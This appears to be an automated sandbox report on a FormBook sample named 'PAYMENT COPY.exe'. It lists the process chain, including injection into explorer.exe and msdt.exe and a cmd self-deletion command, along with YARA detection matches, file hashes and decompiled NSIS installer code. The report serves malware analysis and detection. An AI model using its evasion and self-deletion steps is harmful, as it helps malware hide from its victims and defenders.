62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 38 70 78 20 23 44 30 44 30 44 30 3b 0a 7d 0a 0a 70 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 31 32 70 78 20 31 35 70 78 20 31 32 70 78 20 31 35 70 78 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 3c 68 31 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 09 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 46b<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>404 Page Not Found</title><style type="text/css">::selection { background-color: #E13300; color: white; }::-moz-selection { background-color: #E13300; color: white; }body {background-color: #fff;margin: 40px;font: 13px/20px normal Helvetica, Arial, sans-serif;color: #4F5155;}a {color: #003399;background-color: transparent;font-weight: normal;}h1 {color: #444;background-color: transparent;border-bottom: 1px solid #D0D0D0;font-size: 19px;font-weight: normal;margin: 0 0 14px 0;padding: 14px 15px 10px 15px;}code {font-family: Consolas, Monaco, Courier New, Courier, monospace;font-size: 12px;background-color: #f9f9f9;border: 1px solid #D0D0D0;color: #002166;display: block;margin: 14px 0 14px 0;padding: 12px 10px 12px 10px;}#container {margin: 10px;border: 1px solid #D0D0D0;box-shadow: 0 0 8px #D0D0D0;}p {margin: 12px 15px 12px 15px;}</style></head><body><div id="container"><h1>404 Page Not Found</h1><p>The page you requested was not found.</p></div></body></html>0


                                                                Code Manipulations

                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Start time:09:44:46
                                                                Start date:12/04/2021
                                                                Path:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\PAYMENT COPY.exe'
                                                                Imagebase:0x400000
                                                                File size:206697 bytes
                                                                MD5 hash:0CDBFDF044CFA1D810ED06B745AC9CD9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                General

                                                                Start time:09:44:47
                                                                Start date:12/04/2021
                                                                Path:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\PAYMENT COPY.exe'
                                                                Imagebase:0x400000
                                                                File size:206697 bytes
                                                                MD5 hash:0CDBFDF044CFA1D810ED06B745AC9CD9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                General

                                                                Start time:09:44:52
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:
                                                                Imagebase:0x7ff6f22f0000
                                                                File size:3933184 bytes
                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:09:45:07
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\SysWOW64\msdt.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                Imagebase:0xff0000
                                                                File size:1508352 bytes
                                                                MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:moderate

                                                                General

                                                                Start time:09:45:11
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:/c del 'C:\Users\user\Desktop\PAYMENT COPY.exe'
                                                                Imagebase:0x2a0000
                                                                File size:232960 bytes
                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:09:45:12
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff61de10000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >

                                                                  Executed Functions

                                                                  C-Code - Quality: 86%
                                                                  			_entry_() {
                                                                  				struct _SHFILEINFOA _v356;
                                                                  				long _v372;
                                                                  				char _v380;
                                                                  				int _v396;
                                                                  				CHAR* _v400;
                                                                  				signed int _v404;
                                                                  				signed int _v408;
                                                                  				char _v416;
                                                                  				intOrPtr _v424;
                                                                  				intOrPtr _t31;
                                                                  				void* _t36;
                                                                  				CHAR* _t41;
                                                                  				signed int _t43;
                                                                  				CHAR* _t46;
                                                                  				signed int _t48;
                                                                  				int _t52;
                                                                  				signed int _t56;
                                                                  				void* _t78;
                                                                  				CHAR* _t89;
                                                                  				signed int _t90;
                                                                  				void* _t91;
                                                                  				CHAR* _t96;
                                                                  				signed int _t97;
                                                                  				signed int _t99;
                                                                  				signed char* _t103;
                                                                  				CHAR* _t105;
                                                                  				signed int _t106;
                                                                  				void* _t108;
                                                                  
                                                                  				_t99 = 0;
                                                                  				_v372 = 0;
                                                                  				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                  				_v380 = 0x20;
                                                                  				__imp__#17();
                                                                  				__imp__OleInitialize(0); // executed
                                                                  				 *0x7a3030 = _t31;
                                                                  				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
                                                                  				E004059BF(0x7a2780, "NSIS Error");
                                                                  				_t89 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                                                                  				GetTempPathA(0x400, _t89);
                                                                  				_t36 = E00403116(_t108);
                                                                  				_t109 = _t36;
                                                                  				if(_t36 != 0) {
                                                                  					L2:
                                                                  					_t96 = "\"C:\\Users\\engineer\\Desktop\\PAYMENT COPY.exe\" ";
                                                                  					DeleteFileA(_t96); // executed
                                                                  					E004059BF(_t96, GetCommandLineA());
                                                                  					 *0x7a2f80 = GetModuleHandleA(0);
                                                                  					_t41 = _t96;
                                                                  					if("\"C:\\Users\\engineer\\Desktop\\PAYMENT COPY.exe\" " == 0x22) {
                                                                  						_v404 = 0x22;
                                                                  						_t41 =  &M007A9001;
                                                                  					}
                                                                  					_t43 = CharNextA(E004054F7(_t41, _v404));
                                                                  					_v408 = _t43;
                                                                  					while(1) {
                                                                  						_t91 =  *_t43;
                                                                  						_t112 = _t91;
                                                                  						if(_t91 == 0) {
                                                                  							break;
                                                                  						}
                                                                  						__eflags = _t91 - 0x20;
                                                                  						if(_t91 != 0x20) {
                                                                  							L7:
                                                                  							__eflags =  *_t43 - 0x22;
                                                                  							_v404 = 0x20;
                                                                  							if( *_t43 == 0x22) {
                                                                  								_t43 = _t43 + 1;
                                                                  								__eflags = _t43;
                                                                  								_v404 = 0x22;
                                                                  							}
                                                                  							__eflags =  *_t43 - 0x2f;
                                                                  							if( *_t43 != 0x2f) {
                                                                  								L17:
                                                                  								_t43 = E004054F7(_t43, _v404);
                                                                  								__eflags =  *_t43 - 0x22;
                                                                  								if(__eflags == 0) {
                                                                  									_t43 = _t43 + 1;
                                                                  									__eflags = _t43;
                                                                  								}
                                                                  								continue;
                                                                  							} else {
                                                                  								_t43 = _t43 + 1;
                                                                  								__eflags =  *_t43 - 0x53;
                                                                  								if( *_t43 == 0x53) {
                                                                  									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
                                                                  									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
                                                                  										_t99 = _t99 | 0x00000002;
                                                                  										__eflags = _t99;
                                                                  									}
                                                                  								}
                                                                  								__eflags =  *_t43 - 0x4352434e;
                                                                  								if( *_t43 == 0x4352434e) {
                                                                  									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
                                                                  									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
                                                                  										_t99 = _t99 | 0x00000004;
                                                                  										__eflags = _t99;
                                                                  									}
                                                                  								}
                                                                  								__eflags =  *(_t43 - 2) - 0x3d442f20;
                                                                  								if( *(_t43 - 2) == 0x3d442f20) {
                                                                  									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
                                                                  									__eflags = _t43 + 2;
                                                                  									E004059BF("C:\\Users\\engineer\\AppData\\Local\\Temp", _t43 + 2);
                                                                  									L22:
                                                                  									_t46 = E00402C37(_t112, _t99); // executed
                                                                  									_t105 = _t46;
                                                                  									if(_t105 != 0) {
                                                                  										L32:
                                                                  										E00403501();
                                                                  										__imp__OleUninitialize();
                                                                  										if(_t105 == 0) {
                                                                  											__eflags =  *0x7a3014;
                                                                  											if( *0x7a3014 != 0) {
                                                                  												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
                                                                  												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
                                                                  												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
                                                                  												__eflags = _t106;
                                                                  												if(_t106 != 0) {
                                                                  													__eflags = _t97;
                                                                  													if(_t97 != 0) {
                                                                  														__eflags = _t90;
                                                                  														if(_t90 != 0) {
                                                                  															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
                                                                  															__eflags = _t56;
                                                                  															if(_t56 != 0) {
                                                                  																 *_t97(0, "SeShutdownPrivilege",  &_v400);
                                                                  																_v416 = 1;
                                                                  																_v404 = 2;
                                                                  																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
                                                                  															}
                                                                  														}
                                                                  													}
                                                                  												}
                                                                  												_t52 = ExitWindowsEx(2, 0);
                                                                  												__eflags = _t52;
                                                                  												if(_t52 == 0) {
                                                                  													E00401410(9);
                                                                  												}
                                                                  											}
                                                                  											_t48 =  *0x7a302c;
                                                                  											__eflags = _t48 - 0xffffffff;
                                                                  											if(_t48 != 0xffffffff) {
                                                                  												_v396 = _t48;
                                                                  											}
                                                                  											ExitProcess(_v396);
                                                                  										}
                                                                  										E004052BF(_t105, 0x200010);
                                                                  										ExitProcess(2);
                                                                  									}
                                                                  									if( *0x7a2f94 == _t46) {
                                                                  										L31:
                                                                  										 *0x7a302c =  *0x7a302c | 0xffffffff;
                                                                  										_v396 = E00403526();
                                                                  										goto L32;
                                                                  									}
                                                                  									_t103 = E004054F7(_t96, _t46);
                                                                  									while(_t103 >= _t96) {
                                                                  										__eflags =  *_t103 - 0x3d3f5f20;
                                                                  										if(__eflags == 0) {
                                                                  											break;
                                                                  										}
                                                                  										_t103 = _t103 - 1;
                                                                  										__eflags = _t103;
                                                                  									}
                                                                  									_t116 = _t103 - _t96;
                                                                  									_t105 = "Error launching installer";
                                                                  									if(_t103 < _t96) {
                                                                  										lstrcatA(_t89, "~nsu.tmp\\");
                                                                  										CreateDirectoryA(_t89, 0);
                                                                  										_v404 = _v404 & 0x00000000;
                                                                  										do {
                                                                  											 *0x79d940 = 0x22;
                                                                  											lstrcatA(0x79d940, _t89);
                                                                  											lstrcatA(0x79d940, "Au_.exe");
                                                                  											DeleteFileA(0x79d941);
                                                                  											if(_t105 == 0) {
                                                                  												goto L43;
                                                                  											}
                                                                  											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) {
                                                                  												goto L32;
                                                                  											}
                                                                  											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) {
                                                                  												E00405707(0x79d941, 0);
                                                                  												if("C:\\Users\\engineer\\AppData\\Local\\Temp" == 0) {
                                                                  													E00405513(0x79e140);
                                                                  												} else {
                                                                  													E004059BF(0x79e140, "C:\\Users\\engineer\\AppData\\Local\\Temp");
                                                                  												}
                                                                  												lstrcatA(0x79d940, "\" ");
                                                                  												lstrcatA(0x79d940, _v400);
                                                                  												lstrcatA(0x79d940, " _?=");
                                                                  												lstrcatA(0x79d940, 0x79e140);
                                                                  												E004054CC(0x79d940);
                                                                  												_t78 = E00405247(0x79d940, _t89);
                                                                  												if(_t78 != 0) {
                                                                  													CloseHandle(_t78);
                                                                  													_t105 = 0;
                                                                  												}
                                                                  											}
                                                                  											L43:
                                                                  											"Au_.exe" =  &("Au_.exe"[1]);
                                                                  											_v404 = _v404 + 1;
                                                                  										} while (_v404 < 0x1a);
                                                                  										goto L32;
                                                                  									}
                                                                  									 *_t103 =  *_t103 & 0x00000000;
                                                                  									_t104 =  &(_t103[4]);
                                                                  									if(E004055AC(_t116,  &(_t103[4])) == 0) {
                                                                  										goto L32;
                                                                  									}
                                                                  									E004059BF("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
                                                                  									E004059BF("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
                                                                  									_t105 = 0;
                                                                  									goto L31;
                                                                  								}
                                                                  								goto L17;
                                                                  							}
                                                                  						} else {
                                                                  							goto L6;
                                                                  						}
                                                                  						do {
                                                                  							L6:
                                                                  							_t43 = _t43 + 1;
                                                                  							__eflags =  *_t43 - 0x20;
                                                                  						} while ( *_t43 == 0x20);
                                                                  						goto L7;
                                                                  					}
                                                                  					goto L22;
                                                                  				}
                                                                  				GetWindowsDirectoryA(_t89, 0x3fb);
                                                                  				lstrcatA(_t89, "\\Temp");
                                                                  				if(E00403116(_t109) == 0) {
                                                                  					goto L32;
                                                                  				}
                                                                  				goto L2;
                                                                  			}































                                                                  0x00403153
                                                                  0x00403156
                                                                  0x0040315a
                                                                  0x0040315f
                                                                  0x00403164
                                                                  0x0040316b
                                                                  0x00403171
                                                                  0x00403187
                                                                  0x00403197
                                                                  0x0040319c
                                                                  0x004031a7
                                                                  0x004031ad
                                                                  0x004031b2
                                                                  0x004031b4
                                                                  0x004031da
                                                                  0x004031da
                                                                  0x004031e0
                                                                  0x004031ee
                                                                  0x00403202
                                                                  0x00403207
                                                                  0x00403209
                                                                  0x0040320b
                                                                  0x00403210
                                                                  0x00403210
                                                                  0x00403220
                                                                  0x00403226
                                                                  0x0040328f
                                                                  0x0040328f
                                                                  0x00403291
                                                                  0x00403293
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040322c
                                                                  0x0040322f
                                                                  0x00403237
                                                                  0x00403237
                                                                  0x0040323a
                                                                  0x0040323f
                                                                  0x00403241
                                                                  0x00403241
                                                                  0x00403242
                                                                  0x00403242
                                                                  0x00403247
                                                                  0x0040324a
                                                                  0x0040327f
                                                                  0x00403284
                                                                  0x00403289
                                                                  0x0040328c
                                                                  0x0040328e
                                                                  0x0040328e
                                                                  0x0040328e
                                                                  0x00000000
                                                                  0x0040324c
                                                                  0x0040324c
                                                                  0x0040324d
                                                                  0x00403250
                                                                  0x00403258
                                                                  0x0040325b
                                                                  0x0040325d
                                                                  0x0040325d
                                                                  0x0040325d
                                                                  0x0040325b
                                                                  0x00403260
                                                                  0x00403266
                                                                  0x0040326e
                                                                  0x00403271
                                                                  0x00403273
                                                                  0x00403273
                                                                  0x00403273
                                                                  0x00403271
                                                                  0x00403276
                                                                  0x0040327d
                                                                  0x00403297
                                                                  0x0040329b
                                                                  0x004032a4
                                                                  0x004032a9
                                                                  0x004032aa
                                                                  0x004032af
                                                                  0x004032b3
                                                                  0x00403316
                                                                  0x00403316
                                                                  0x0040331b
                                                                  0x00403323
                                                                  0x0040344e
                                                                  0x00403455
                                                                  0x00403471
                                                                  0x0040347e
                                                                  0x00403487
                                                                  0x00403489
                                                                  0x0040348b
                                                                  0x0040348d
                                                                  0x0040348f
                                                                  0x00403491
                                                                  0x00403493
                                                                  0x004034a3
                                                                  0x004034a5
                                                                  0x004034a7
                                                                  0x004034b4
                                                                  0x004034c3
                                                                  0x004034cb
                                                                  0x004034d3
                                                                  0x004034d3
                                                                  0x004034a7
                                                                  0x00403493
                                                                  0x0040348f
                                                                  0x004034d8
                                                                  0x004034de
                                                                  0x004034e0
                                                                  0x004034e4
                                                                  0x004034e4
                                                                  0x004034e0
                                                                  0x004034e9
                                                                  0x004034ee
                                                                  0x004034f1
                                                                  0x004034f3
                                                                  0x004034f3
                                                                  0x004034fb
                                                                  0x004034fb
                                                                  0x0040332f
                                                                  0x00403336
                                                                  0x00403336
                                                                  0x004032bb
                                                                  0x00403306
                                                                  0x00403306
                                                                  0x00403312
                                                                  0x00000000
                                                                  0x00403312
                                                                  0x004032c4
                                                                  0x004032d1
                                                                  0x004032c8
                                                                  0x004032ce
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004032d0
                                                                  0x004032d0
                                                                  0x004032d0
                                                                  0x004032d5
                                                                  0x004032d7
                                                                  0x004032dc
                                                                  0x00403342
                                                                  0x0040334a
                                                                  0x00403350
                                                                  0x0040335f
                                                                  0x00403361
                                                                  0x0040336a
                                                                  0x00403375
                                                                  0x0040337f
                                                                  0x00403387
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004033b3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004033c9
                                                                  0x004033d2
                                                                  0x004033de
                                                                  0x004033ee
                                                                  0x004033e0
                                                                  0x004033e6
                                                                  0x004033e6
                                                                  0x004033f9
                                                                  0x00403403
                                                                  0x0040340e
                                                                  0x00403415
                                                                  0x0040341b
                                                                  0x00403422
                                                                  0x00403429
                                                                  0x0040342c
                                                                  0x00403432
                                                                  0x00403432
                                                                  0x00403429
                                                                  0x00403434
                                                                  0x00403434
                                                                  0x0040343a
                                                                  0x0040343e
                                                                  0x00000000
                                                                  0x00403449
                                                                  0x004032de
                                                                  0x004032e1
                                                                  0x004032ec
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004032f4
                                                                  0x004032ff
                                                                  0x00403304
                                                                  0x00000000
                                                                  0x00403304
                                                                  0x00000000
                                                                  0x0040327d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403231
                                                                  0x00403231
                                                                  0x00403231
                                                                  0x00403232
                                                                  0x00403232
                                                                  0x00000000
                                                                  0x00403231
                                                                  0x00000000
                                                                  0x00403295
                                                                  0x004031bc
                                                                  0x004031c8
                                                                  0x004031d4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  APIs
                                                                  • #17.COMCTL32 ref: 00403164
                                                                  • OleInitialize.OLE32(00000000), ref: 0040316B
                                                                  • SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187
                                                                    • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8
                                                                    • Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                                                  • DeleteFileA.KERNELBASE("C:\Users\user\Desktop\PAYMENT COPY.exe" ), ref: 004031E0
                                                                  • GetCommandLineA.KERNEL32 ref: 004031E6
                                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000000), ref: 004031F5
                                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000020), ref: 00403220
                                                                  • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
                                                                  • ExitProcess.KERNEL32 ref: 00403336
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000000,00000000,00000000,00000020), ref: 00403342
                                                                  • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000000,00000000,00000000,00000020), ref: 0040334A
                                                                  • lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
                                                                  • lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
                                                                  • DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
                                                                  • GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
                                                                  • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
                                                                  • CopyFileA.KERNEL32(0079E140,0079D941,00000000), ref: 004033C1
                                                                  • lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
                                                                  • lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
                                                                  • lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
                                                                  • lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
                                                                  • CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
                                                                  • ExitProcess.KERNEL32 ref: 004034FB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
                                                                  • String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\PAYMENT COPY.exe" $@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
                                                                  • API String ID: 3079827372-441189474
                                                                  • Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                  • Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
                                                                  • Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                  • Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 98%
                                                                  			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                                  				signed int _v8;
                                                                  				signed int _v12;
                                                                  				struct _WIN32_FIND_DATAA _v332;
                                                                  				signed int _t37;
                                                                  				char* _t49;
